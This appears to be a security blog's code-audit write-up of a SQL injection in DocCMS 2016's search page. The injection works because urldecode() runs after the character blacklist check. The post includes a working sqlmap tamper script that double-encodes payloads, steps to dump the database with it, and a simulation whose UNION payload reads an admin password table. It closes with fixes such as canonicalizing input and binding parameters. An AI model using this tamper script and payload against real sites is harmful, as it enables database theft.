A code-audit case of a SQL injection through secondary (double) URL decoding, with the sqlmap tamper script attached.
Doccms official website: http://www.doccms.com
Source code: doccms2016
Download address: https://pan.baidu.com/s/1plclifl
In /content/search/index.php, the keyword parameter is first run through an illegal-character check:
Following the checksqlstr function into /Inc/function.php shows how the filtering is done:
checksqlstr runs a regular expression over the incoming string to test for illegal characters. Next, look at the get_search_result function in /content/search/index.php:
After the keyword parameter passes the illegal-character check, it is decoded with urldecode() and concatenated into the SQL statement that is executed. The check runs on the value as PHP delivers it, which has already been URL-decoded once by the request handling. A double URL-encoded value such as %2527 therefore reaches the check as %27, which contains no illegal character, and only the later urldecode() turns it back into a single quote, immediately before the value is spliced into the query. The filter never sees the quote, and the result is a SQL injection.
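To make the ordering concrete, here is an added simulation written for this page (it is not DocCMS's own code): a Python stand-in for checksqlstr with an assumed character blacklist (the real pattern is not shown on the page), a get_search_result that validates, then urldecodes, then splices the value into SQL against an in-memory SQLite table with constructed rows, and a handle_request wrapper that performs the single decode PHP applies to the query string before the script runs. The table names, rows and payload are all constructed.

```python
import re
import sqlite3
from urllib.parse import quote, unquote

# Assumed stand-in for checksqlstr(): the page says it regex-matches the
# parameter for illegal characters but does not show the pattern, so this
# character blacklist is a guess, not DocCMS's code.
ILLEGAL = re.compile(r"""['"\\;#]|--|/\*""")

# Constructed payload: closes the LIKE quote, appends a UNION that reads another
# table, and re-opens a quote so the trailing "%'" of the original query still
# parses (no comment sequence needed).
PAYLOAD = "' UNION SELECT password FROM admin WHERE '' LIKE '"


def checksqlstr(value):
    """True when the value contains none of the blacklisted characters."""
    return ILLEGAL.search(value) is None


def single_url_encode(value):
    return quote(value, safe="")                    # "'" -> "%27", " " -> "%20"


def double_url_encode(value):
    return quote(quote(value, safe=""), safe="")    # "'" -> "%27" -> "%2527"


def setup_db():
    """In-memory SQLite with constructed rows standing in for the CMS tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE doc (title TEXT)")
    conn.executemany("INSERT INTO doc VALUES (?)",
                     [("Install guide",), ("Template guide",), ("Changelog",)])
    conn.execute("CREATE TABLE admin (password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('constructed-hash')")
    return conn


def get_search_result(conn, keyword):
    """Models the vulnerable ordering the page describes:
    1. validate the parameter as received,
    2. urldecode() it,
    3. splice the decoded value into the SQL text."""
    if not checksqlstr(keyword):
        return "blocked"
    keyword = unquote(keyword)                      # PHP urldecode()
    sql = "SELECT title FROM doc WHERE title LIKE '%" + keyword + "%'"
    return [row[0] for row in conn.execute(sql)]


def handle_request(conn, raw_query_value):
    """PHP decodes the query string once before the script runs, so the check
    inside get_search_result() only sees the result of that first decode."""
    return get_search_result(conn, unquote(raw_query_value))


if __name__ == "__main__":
    db = setup_db()
    print(handle_request(db, "guide"))                        # normal search
    print(handle_request(db, single_url_encode(PAYLOAD)))     # blocked by the check
    print(handle_request(db, double_url_encode(PAYLOAD)))     # titles plus the admin password
```

Note that quote() only percent-encodes punctuation and spaces, so a filter that also blacklists keywords such as UNION would still see them after the first decode; the bypass on this page works because the check is purely character based.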
1. Write a tamper script that double URL-encodes every payload. The tamper script is as follows:
#!/usr/bin/env python
# sqlmap tamper script: URL-encode the payload twice. The web server / PHP
# undoes one layer, so the illegal-character check sees "%27" instead of a
# quote, and urldecode() in get_search_result() restores the quote right
# before the value is spliced into the SQL statement.
try:
    from urllib import quote              # Python 2 (sqlmap of that era)
except ImportError:
    from urllib.parse import quote        # Python 3
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        # quote() twice: "'" -> "%27" -> "%2527"
        retVal = quote(quote(retVal))
    return retVal
2. Load the tamper script in sqlmap (the --tamper option) and dump the sensitive data from the database.
During a code audit, watch for decoding functions applied after input validation, such as urldecode(), rawurldecode() and base64_decode(): anything decoded after the check has run can be used to bypass the protection.
In real-world testing there are also cases of SQL and XSS filters bypassed by double encoding. Besides the plain single and double quote, it is worth probing with %2527 and %2522 as well.
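As an added example for the two paragraphs above (written for this page, not taken from DocCMS or the author), the encoded probes a tester would send for any probe character, next to the defensive ordering that closes this class of bug: canonicalize the value by decoding until it stops changing before any blacklist runs, and, more importantly, bind the keyword as a query parameter instead of splicing it into the SQL text. The blacklist, table and keywords are constructed.

```python
import base64
import re
import sqlite3
from urllib.parse import quote, unquote, unquote_plus

# Assumed blacklist standing in for checksqlstr(); the real pattern is not on the page.
ILLEGAL = re.compile(r"""['"\\;#]|--|/\*""")


def probe_variants(probe="'"):
    """Encodings of one probe character to send when the plain character is
    blocked: %27 (what PHP hands the script after its own decode), %2527
    (double URL encoding, the case on this page) and base64 for parameters
    the application runs through base64_decode()."""
    once = quote(probe, safe="")
    return {
        "raw": probe,
        "url": once,
        "double_url": quote(once, safe=""),
        "base64": base64.b64encode(probe.encode()).decode(),
    }


def canonicalize(value, max_rounds=5):
    """Decode URL escapes until the string stops changing, so validation sees
    the same bytes the SQL layer will. unquote_plus mirrors PHP urldecode()
    ('+' becomes a space); unquote() would mirror rawurldecode(). Returns None
    when the value is still changing after max_rounds, which is a reason to
    reject it rather than keep peeling layers."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            return value
        value = decoded
    return None


def checksqlstr_fixed(value):
    """Blacklist applied to the canonical form, so %2527 is judged as a quote."""
    canon = canonicalize(value)
    return canon is not None and ILLEGAL.search(canon) is None


def setup_db():
    """In-memory SQLite with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE doc (title TEXT)")
    conn.executemany("INSERT INTO doc VALUES (?)",
                     [("Install guide",), ("Template guide",), ("Changelog",)])
    return conn


def search_titles_fixed(conn, keyword):
    """Decode once, as the original code does, then bind the value instead of
    splicing it. LIKE metacharacters in the keyword are escaped so '%' and '_'
    match literally; injected SQL text is just a string the database compares."""
    keyword = unquote(keyword)
    pattern = "%" + re.sub(r"([%_\\])", r"\\\1", keyword) + "%"
    rows = conn.execute(
        "SELECT title FROM doc WHERE title LIKE ? ESCAPE '\\'", (pattern,))
    return [r[0] for r in rows]


if __name__ == "__main__":
    print(probe_variants("'"))
    print(probe_variants('"'))
    print(checksqlstr_fixed("guide"), checksqlstr_fixed("%2527"))
    db = setup_db()
    print(search_titles_fixed(db, "guide"))
    print(search_titles_fixed(db, "%2527%2520UNION%2520SELECT%25201"))
```

Canonicalizing before the blacklist only fixes the mismatch between what the filter sees and what the database sees; binding the parameter is what removes the injection regardless of how the value was encoded.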
About Me
A network security enthusiast with a stubborn pursuit of technology, committed to sharing original, high-quality content, including but not limited to penetration testing, WAF bypass, code audit and security operations.